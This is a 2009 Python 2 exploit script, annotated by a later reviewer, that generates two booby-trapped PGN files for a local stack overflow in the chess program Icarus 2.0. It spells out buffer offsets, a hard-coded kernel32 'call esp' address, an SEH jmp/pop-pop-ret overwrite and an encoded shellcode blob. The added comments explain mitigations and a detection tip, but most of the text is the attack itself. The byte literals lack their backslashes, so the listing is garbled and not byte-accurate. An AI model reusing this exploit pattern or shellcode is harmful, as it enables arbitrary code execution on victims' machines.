
icarus-overflow.txt

Posted on 19 March 2009

#usage: exploit.py
#
# Proof-of-concept file generator (Python 2 print statements) for the
# "Icarus 2.0 Local Stack Overflow" named in the banner below. The script does
# nothing but build two strings and write them to exploit_eip.PGN and
# exploit_seh.PGN in the current working directory.
# NOTE(review): as captured on this page the string literals carry no
# backslashes, so "x41" is the three characters x, 4, 1 rather than one byte.
# This listing is therefore not a byte-accurate copy of the original script.
# NOTE(review): the vulnerable code in Icarus is not shown here; presumably the
# PGN loader copies file content into a fixed-size stack buffer without a
# length check -- confirm against the application before relying on this.
print "********************************************************************"
print " Icarus 2.0 Local Stack Overflow Exploit "
print " Download: http://www.randomsoftware.com/pub/icarus.exe"
print " Author : His0k4"
print " Tested on: Windows XP Pro SP2 Fr "
print " Greetings to:"
print " All friends & muslims HaCkers(dz) "
print " Tip of the day: Klimontayne fe romayne :D"
print "******************************************************************** "

# --- payload1: body of the file the author calls the "Eip" variant ---
# 336 filler values come first, then one 4-byte value.
payload1 = "x41" * 336
# Hard-coded address inside a system DLL. The author's note ties it to one
# service-pack build, so it only holds where that module loads at a fixed,
# known base -- the dependency that ASLR removes.
payload1 += "x5Dx38x82x7C" # call esp kernel32.dll (sp2)
payload1 += "x90" * 19 #some nops
# Opaque encoded blob, 10 literals of 16 values each. Nothing on the page
# states what it does; treat it as unreviewed machine code and do not assume
# it is benign. Running from the stack is what DEP/NX is designed to block.
payload1 += "x29xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x38"
payload1 += "x4exf9x9fx83xebxfcxe2xf4xc4xa6xbdx9fx38x4ex72xda"
payload1 += "x04xc5x85x9ax40x4fx16x14x77x56x72xc0x18x4fx12xd6"
payload1 += "xb3x7ax72x9exd6x7fx39x06x94xcax39xebx3fx8fx33x92"
payload1 += "x39x8cx12x6bx03x1axddx9bx4dxabx72xc0x1cx4fx12xf9"
payload1 += "xb3x42xb2x14x67x52xf8x74xb3x52x72x9exd3xc7xa5xbb"
payload1 += "x3cx8dxc8x5fx5cxc5xb9xafxbdx8ex81x93xb3x0exf5x14"
payload1 += "x48x52x54x14x50x46x12x96xb3xcex49x9fx38x4ex72xf7"
payload1 += "x04x11xc8x69x58x18x70x67xbbx8ex82xcfx50xbex73x9b"
payload1 += "x67x26x61x61xb2x40xaex60xdfx2dx98xf3x5bx4exf9x9f"

# 7000 trailing filler values, appended to payload1 only when the first file
# is written.
junk = "xCC"*7000

# --- payload2: body of the file the author calls the "Seh" variant ---
# Read as hex byte values, the first three literals spell two PGN-style tag
# lines, [Format "Lecture"] and [Title "exploit"], followed by a blank line,
# so the file opens like an ordinary tagged game file.
payload2 = "x5Bx46x6Fx72x6Dx61x74x20x22x4Cx65x63x74x75x72x65x22x5D"
payload2 += "x0Ax5Bx54x69x74x6Cx65x20x22x65x78x70x6Cx6Fx69x74x22x5D"
payload2 += "x0Ax0A"
# 788 filler values, then two 4-byte values. Per the author's annotations they
# form an exception-handler-record overwrite; SafeSEH and SEHOP are the
# mitigations aimed at that pattern.
payload2 += "x41"*788
payload2 += "xEBx06x90x90" # jmp +6
payload2 += "xE9x10x37x01" # universal pop pop ret
# Same 10-literal blob as in payload1 (the literals are identical).
payload2 += "x29xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x38"
payload2 += "x4exf9x9fx83xebxfcxe2xf4xc4xa6xbdx9fx38x4ex72xda"
payload2 += "x04xc5x85x9ax40x4fx16x14x77x56x72xc0x18x4fx12xd6"
payload2 += "xb3x7ax72x9exd6x7fx39x06x94xcax39xebx3fx8fx33x92"
payload2 += "x39x8cx12x6bx03x1axddx9bx4dxabx72xc0x1cx4fx12xf9"
payload2 += "xb3x42xb2x14x67x52xf8x74xb3x52x72x9exd3xc7xa5xbb"
payload2 += "x3cx8dxc8x5fx5cxc5xb9xafxbdx8ex81x93xb3x0exf5x14"
payload2 += "x48x52x54x14x50x46x12x96xb3xcex49x9fx38x4ex72xf7"
payload2 += "x04x11xc8x69x58x18x70x67xbbx8ex82xcfx50xbex73x9b"
payload2 += "x67x26x61x61xb2x40xaex60xdfx2dx98xf3x5bx4exf9x9f"
# Unlike the first file, the 7000 filler values are folded into payload2 itself.
payload2 += "xCC"*7000

# Write the first file. The bare except hides the real error (permissions,
# disk full, ...) behind "Error", and out_file is not closed if write() raises.
# For triage: a .PGN file is normally short plain text, so a multi-kilobyte
# run of one repeated value is a simple anomaly to look for.
try:
    out_file = open("exploit_eip.PGN",'w')
    out_file.write(payload1+junk)
    out_file.close()
    print "Eip exploit File Created! Now you can run this file directly "
except:
    print "Error"

# Write the second file; same error-handling caveats as above.
try:
    out_file = open("exploit_seh.PGN",'w')
    out_file.write(payload2)
    out_file.close()
    print "Seh exploit File Created! Open Icarus then game>load and chose exploit_seh.PGN "
except:
    print "Error"

 
